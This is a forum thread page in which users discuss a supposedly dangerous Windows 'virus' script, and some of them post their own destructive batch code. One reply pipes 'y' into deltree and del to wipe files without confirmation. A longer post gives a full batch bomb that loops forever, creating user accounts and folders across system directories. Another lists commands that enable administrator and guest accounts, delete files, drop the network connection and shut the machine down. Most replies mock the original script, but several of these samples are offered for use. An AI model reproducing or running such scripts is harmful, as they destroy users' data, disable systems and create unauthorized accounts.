Welcome Guest ( Log In | Register )




                Web Hosting Guide

3 Pages V  < 1 2 3 >  
Reply to this topicNew Topic
Very Easy But Very Dangerous Virus
FirefoxRocks
post Nov 8 2006, 01:57 PM
Post #11


Super Member
Group Icon

Group: [HOSTED]
Posts: 873
Joined: 12-July 06
From: Ontario, Canada
Member No.: 14,464
myCENTs:79.31


This is absolutely useless, as others pointed out.
Windows will not allow you to delete the Windows folder once booted up and even changing the drive letter of a compressed FAT drive will nto work if Windows is installed on it.

Unless you can execute this script without user confirmation (using the /q switch), I think that this is useless. Who would press "Y" on this command?

If you do use quiet mode, it still requires pure DOS mode. That means no Windows has to be loaded. As far as I know, only Windows 95 supports this. I think Windows 98 can, but you need a startup disk in order for that to work.
Go to the top of the page
 
+Quote Post
vhortex
post Nov 9 2006, 12:46 AM
Post #12


Guilty Until Proven Innocent
Group Icon

Group: Members
Posts: 372
Joined: 13-April 05
Member No.: 3,937


QUOTE(FirefoxRocks @ Nov 8 2006, 09:57 PM) [snapback]91221[/snapback]

Unless you can execute this script without user confirmation (using the /q switch), I think that this is useless. Who would press "Y" on this command?


on the pressing of "Y"..
i know 5 ways to do that without the user knowing.. and windows or even DOS provides the 4 methods..

Go to the top of the page
 
+Quote Post
xboxrulz
post Nov 9 2006, 03:25 AM
Post #13


Colonel Panic
Group Icon

Group: [MODERATOR]
Posts: 3,055
Joined: 25-March 05
From: Toronto, Ontario, Canada
Member No.: 3,233
myCENTs:59.15


funny, this virus doesn't work w/ Linux because first of all, it's not in Shell script and who would install Linux on the same partition w/ Windows knowing that it could be easily and accidentally erased!

xboxrulz
Go to the top of the page
 
+Quote Post
ne0
post Jan 1 2007, 07:05 AM
Post #14


Newbie [ Level 2 ]
Group Icon

Group: Members
Posts: 14
Joined: 30-December 06
Member No.: 18,945


In my opinion virus itself is dangerous when it's invisible.

Mainly the viruses are

-worms
-trojans
-backdoors

Worms are the most dangerous ones, because they walk from computer to computer and infect
them. A virusmaker (worm coder) uses vulnerabilities of operating systems or of any software
in order to code a worm that then his/her worm could easily infect another computer without
his/her interaction. And then the process of infecting goes on automatically.
And that's why the worms are the most dangerous because they infect their victims faster
than other types of viruses.

Trojans are just like thieves. They steal passwords, banking accounts , or any sensitive
information.



Backdoors are just like "back doors" smile.gif. While on victims computer they open a port (TCP/IP)
like a tunnel or "back door". Through this "back door" an attacker enters the victims
computer and does what he/she want. Nowadays these open ports are easily closed by firewalls.
And that's why these types of viruses are not effective.

The "virus" in your case hm.. is only a part of script of a body of a virus listed above.
And it cannot be run with user interaction (we should assume that users are not
babies or .. smile.gif ) . Mainly it can be used to cover the tracks of an attacker (by modifying
the content of your batch script , of course by not deleting the whole $WINDOWS$ smile.gif ).
Go to the top of the page
 
+Quote Post
Nathaniel Strieg...
post Apr 12 2007, 05:50 PM
Post #15


Newbie [ Level 1 ]
Group Icon

Group: Members
Posts: 3
Joined: 12-April 07
Member No.: 21,425


not only is that lame, it wont work.
*nix systems don't have a C: at all, so it's only windows in the firs place. also, as pointed out, it won't let the user delete the windows directory while windows is booted.
you would have far better result if you did some thing like this...
@echo y|deltree *.
@echo y|del *.*
Go to the top of the page
 
+Quote Post
AxeFestis
post May 30 2007, 03:18 PM
Post #16


Newbie [ Level 2 ]
Group Icon

Group: Members
Posts: 10
Joined: 29-May 07
Member No.: 22,244


This is basic stuff we are not n00b's can some one add something more difficult
Go to the top of the page
 
+Quote Post
iGuest
post Mar 17 2009, 11:48 PM
Post #17


Newbie [ Level 1 ]
Group Icon

Group: Members
Posts: 0
Joined: 1-November 07
Member No.: 25,869


@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
@ECHO :flood5 >> bat6.Bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.Bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
START /MIN bat6.Bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.Bat
@ECHO SET maggi=1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
@ECHO :flood4 >> bat5.Bat
@ECHO MKDIR maggi%%maggi%% >> bat5.Bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
START /MIN bat5.Bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.Bat
@ECHO SET marge=1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
@ECHO :flood3 >> bat4.Bat
@ECHO MKDIR marge%%marge%% >> bat4.Bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
START /MIN bat4.Bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.Bat
@ECHO SET bart=1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
@ECHO :flood2 >> bat3.Bat
@ECHO MKDIR bart%%bart%% >> bat3.Bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
START /MIN bat3.Bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.Bat
@ECHO SET homer=1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
@ECHO :flood >> bat2.Bat
@ECHO MKDIR homer%%homer%% >> bat2.Bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
START /MIN bat2.Bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

Try this still not a virus just a .Bat file but a fun one also very annoying.

Go to the top of the page
 
+Quote Post
iGuest
post Apr 30 2009, 11:18 PM
Post #18


Newbie [ Level 1 ]
Group Icon

Group: Members
Posts: 0
Joined: 1-November 07
Member No.: 25,869


Ok, where to start...

First of all, virii cant spread themselves, they only infect the node they are currently in. Worms on the other hand can spread. Worms ARE NOT DANGEROUS unless they have a payload in them. A payload can be a regular program, virii, or other random things like trojans, backdoors, polymorphs, and so on and so forth.

Now, I see we have some intermediate scripters, like me, and some script kiddes, which is ok if your younger. Just for the SK's info, vb virii are hardly used anymore. They can pretty much only be used on your own computer or the extremely unprotected computer. Although it can be kinda fun just screwing around on a junk HD. I suggest after or durring studying vb, you should look into c++, java, javascript, and some lesser known types like ruby and perl (not pokemon games). C++ can be widely used, not just for a virus, but for webpages, programs, and what-not. So, if u wanna get arrested, make something like a fake program or something, put a virus in it, and put it on the web. Java and java script are widely used on the internet for games and stuff. This can be fun cause it's the idiot's fault for getting it. (sorry if it offended anyone, but it's kinda true). And the other two, ruby and perl, they can be used for white/black hat hacking, virii, and several other things as well. They are mostly (if not only) used on/for linux and GPLOSs for most of their programs. A prime example of these two can be found on the os, BACKTRACK 1,2,3,and 4beta (depending on how old this post is).

So there u have it, scripting for dummies. Just make sure that none of u guys (or maybe girls) get caught doing the bad thing. Have fun!

-reply by shikagami
Go to the top of the page
 
+Quote Post
iGuest
post Aug 8 2009, 09:32 AM
Post #19


Newbie [ Level 1 ]
Group Icon

Group: Members
Posts: 0
Joined: 1-November 07
Member No.: 25,869


Answer
Very Easy But Very Dangerous Virus

net user administrator /active:yes

net user administrator *insertpassword

start net user guest /active:yes

net user guest *insertpassword

start @echo y|del *.*

ipconfig/release

start shutdown

You can elaborate some more but you get the idea

-reply by H4CK3R
Go to the top of the page
 
+Quote Post
surfermac
post Aug 15 2009, 09:45 AM
Post #20


Advanced Member
Group Icon

Group: Members
Posts: 137
Joined: 13-August 09
From: India
Member No.: 42,199
myCENTs:83.73


YOu call that a virus
????
you need to know more than that to create one
Go to the top of the page
 
+Quote Post

3 Pages V  < 1 2 3 >
Fast ReplyReply to this topicNew Topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 

Collapse

> Similar Topics

    Topic Title Replies Topic Starter Views Last Action
No New Posts 9 BHerath 1,116 24th February 2010 - 05:54 PM
Last post by: iG-Pete
No New Posts   4 jsuthers 1,262 19th February 2010 - 06:31 AM
Last post by: iG-vandana
No New Posts   0 medha 74 25th January 2010 - 05:53 AM
Last post by: medha
No New Posts   4 kxrain 4,371 21st January 2010 - 06:07 AM
Last post by: iG-Comp tech
No New Posts 17 kanade 2,325 5th January 2010 - 05:22 PM
Last post by: iG-Ganesh Kuppan
No new   23 J.C. 18,581 31st December 2009 - 07:31 AM
Last post by: iG-iresha
No New Posts   2 magstuar 1,252 17th December 2009 - 05:27 AM
Last post by: iG-
No new   25 swizzeron 4,853 12th December 2009 - 01:50 AM
Last post by: bradzo
No New Posts   0 sunrase00 100 7th December 2009 - 08:17 AM
Last post by: sunrase00
No new   66 Takumi-san 8,606 2nd December 2009 - 09:30 PM
Last post by: iG-Bogdan
No New Posts   1 Happyday 105 24th November 2009 - 09:17 PM
Last post by: yordan
No New Posts 4 miCRoSCoPiC^eaRthLinG 2,189 24th November 2009 - 03:37 PM
Last post by: iG-eddie
No New Posts 12 designer 4,530 4th November 2009 - 10:37 PM
Last post by: HannahI
No New Posts 3 fermin25 174 22nd October 2009 - 07:32 PM
Last post by: starscream
No New Posts   10 willmark 363 15th September 2009 - 08:30 AM
Last post by: grim reaper1666


Web Hosting Powered by ComputingHost.com.
HONESTY ROCKS! truth rules.
Creative Commons License